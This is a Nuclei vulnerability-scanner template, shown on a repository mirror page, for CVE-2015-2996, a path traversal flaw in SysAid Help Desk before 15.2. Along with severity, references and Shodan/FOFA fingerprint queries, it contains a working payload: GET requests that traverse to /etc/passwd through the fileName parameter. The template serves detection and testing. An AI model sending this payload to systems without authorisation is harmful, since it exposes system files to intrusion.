daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2015/CVE-2015-2996.yaml

52 lines
2.0 KiB
YAML
Raw Permalink Blame History

id: CVE-2015-2996
info:
name: SysAid Help Desk <15.2 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
remediation: |
Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
reference:
- https://seclists.org/fulldisclosure/2015/Jun/8
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
- http://seclists.org/fulldisclosure/2015/Jun/8
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
cvss-score: 8.5
cve-id: CVE-2015-2996
cwe-id: CWE-22
epss-score: 0.77754
epss-percentile: 0.98153
cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: sysaid
product: sysaid
shodan-query: http.favicon.hash:1540720428
fofa-query: icon_hash=1540720428
tags: cve2015,cve,sysaid,lfi,seclists
http:
- method: GET
path:
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a0047304502210082e020d9e8b2d5d7e7bef721183a3753d3d1f6e6d5edac73c48741770d80b66602205d8cf502e70a1a70092bcd7073f6e35af23efdbb2810f7f5d4def6c4926d45b4:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink